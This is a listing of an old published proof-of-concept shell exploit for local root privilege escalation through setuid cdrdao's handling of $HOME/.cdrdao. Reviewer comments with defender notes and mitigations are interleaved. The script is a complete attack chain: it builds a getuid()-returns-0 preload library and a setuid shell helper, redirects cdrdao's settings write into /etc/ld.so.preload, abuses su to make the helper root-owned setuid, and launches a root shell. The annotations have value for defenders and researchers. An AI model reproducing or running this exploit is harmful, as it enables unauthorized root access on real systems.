1 #!/bin/sh
# Archived proof-of-concept for a local privilege escalation through cdrdao's
# handling of $HOME/.cdrdao, kept here as a record of the technique.
# NOTE(review): this listing was extracted from a paginated print-out, so the
# leading numbers are gutter line numbers and the quote and dash characters are
# typographic; read it as documentation, not as a runnable script.
# This part only checks preconditions and builds two helper artefacts in the
# current directory; the privileged write happens later in the script.
2 DIR=‘pwd‘
3 echo ""
4 echo "cdrdao local root exploit − gr doesn’t protect you this time"
5 echo "Karol Wiêsek <appelast*drumnbass.art.pl>"
6 echo ""
7 sleep 2
# umask 000 masks no permission bits on files created from here on.
# NOTE(review): presumably this is what leaves the file later created through
# cdrdao writable by the invoking user; confirm against cdrdao's open() mode.
8 umask 000
# Precondition: the script stops if /etc/ld.so.preload already exists.
# Defender note: on most systems this file is absent, so its creation is a
# high-signal event for file-integrity monitoring or an audit watch.
9 echo −n "[*] Checking if /etc/ld.so.preload doesn’t exist ... "
10 if [ −f /etc/ld.so.preload ]; then
11 echo "WRONG"
12 echo "/etc/ld.so.preload exists, write another exploit ;P"
13 exit
14 else
15 echo "OK"
16 fi
# Precondition: /bin/su must carry the setuid bit, otherwise the script stops.
17 echo −n "[*] Checking if su is setuid ... "
18 if [ −u /bin/su ];then
19 echo "OK"
20 else
21 echo "WRONG"
22 exit
23 fi
# Builds getuid_lib.so, a shared object whose only symbol is a getuid() that
# always returns 0, then deletes the intermediate source and object files.
# Defender note: a library path under a user-writable directory appearing in
# /etc/ld.so.preload is the indicator to look for.
24 echo −n "[*] Creating evil *uid() library ... "
25 cat > getuid_lib.c << _EOF
26 int getuid(void) {
27 return 0; }
28 _EOF
29 gcc −o getuid_lib.o −c getuid_lib.c
30 ld −shared −o getuid_lib.so getuid_lib.o
31 rm −f getuid_lib.c getuid_lib.o
32 if [ −f ./getuid_lib.so ]; then
33 echo "OK"
34 else
35 echo "WRONG"
36 fi
# Builds ./suid, a helper that calls setgid(0) and setuid(0), unlinks its own
# file and then execs /bin/sh. It is harmless until something running as root
# changes its owner and mode, which a later step of the script arranges.
# Defender note: mounting user-writable filesystems with nosuid makes set-id
# bits on such a helper ineffective.
37 echo −n "[*] Creating suidshell ... "
38 cat > suid.c << _EOF
39 int main(void) {
40 setgid(0); setuid(0);
41 unlink("./suid");
42 execl("/bin/sh","sh",0); }
43 _EOF
44 gcc −o suid suid.c
45 rm −f suid.c
46 if [ −x ./suid ];then
47 echo "OK"
48 else
49 echo "WRONG"
50 exit
51 fi
52 echo −n "[*] Exploiting cdrdao ... "
# Core of the issue: $HOME/.cdrdao is replaced by a symlink to
# /etc/ld.so.preload before cdrdao is asked to save its settings.
# NOTE(review): presumably cdrdao is installed setuid root here and writes its
# settings file without dropping privileges or refusing symlinks; the script
# relies on that, but it is not shown on this page. Confirm against the
# vendor advisory.
# Mitigation: remove the setuid bit from cdrdao or install the vendor fix. A
# privileged program should drop privileges before touching paths under $HOME
# and open them with O_NOFOLLOW.
53 ln −sf /etc/ld.so.preload $HOME/.cdrdao
54 if [ ! −L $HOME/.cdrdao ];then
55 echo "Could’n link to \$HOME/.cdrdao"
56 exit
57 fi
58 cdrdao unlock −−save 2>/dev/null
# The invoking user now truncates /etc/ld.so.preload and writes the path of
# the getuid_lib.so built earlier into it, which only works if the previous
# step left that file writable by this user.
59 >/etc/ld.so.preload
60 echo "$DIR/getuid_lib.so" > /etc/ld.so.preload
# Runs su with a command that deletes /etc/ld.so.preload, gives ./suid to
# root:root and sets its set-id bits.
# NOTE(review): presumably su trusts the preloaded getuid() returning 0 and
# skips authentication; this depends on the su and loader in use.
61 su − −c "rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid"
# [ -s ] only checks that ./suid is a non-empty file.
62 if [ −s ./suid ];then
63 echo "OK"
64 else
65 echo "WRONG"
66 exit
67 fi
# Clean-up: the library and the symlink are removed here, /etc/ld.so.preload
# was removed by the su command, and the helper unlinks itself when run.
# Defender note: little is left on disk afterwards, so audit records of writes
# to /etc/ld.so.preload and of chown/chmod on files in user directories are
# more dependable evidence than a later file-system inspection.
68 rm −f getuid_lib.so
69 unlink $HOME/.cdrdao
70 echo "Entering rootshell ... ;]"
71 ./suid
72
73 # milw0rm.com [2004−09−07]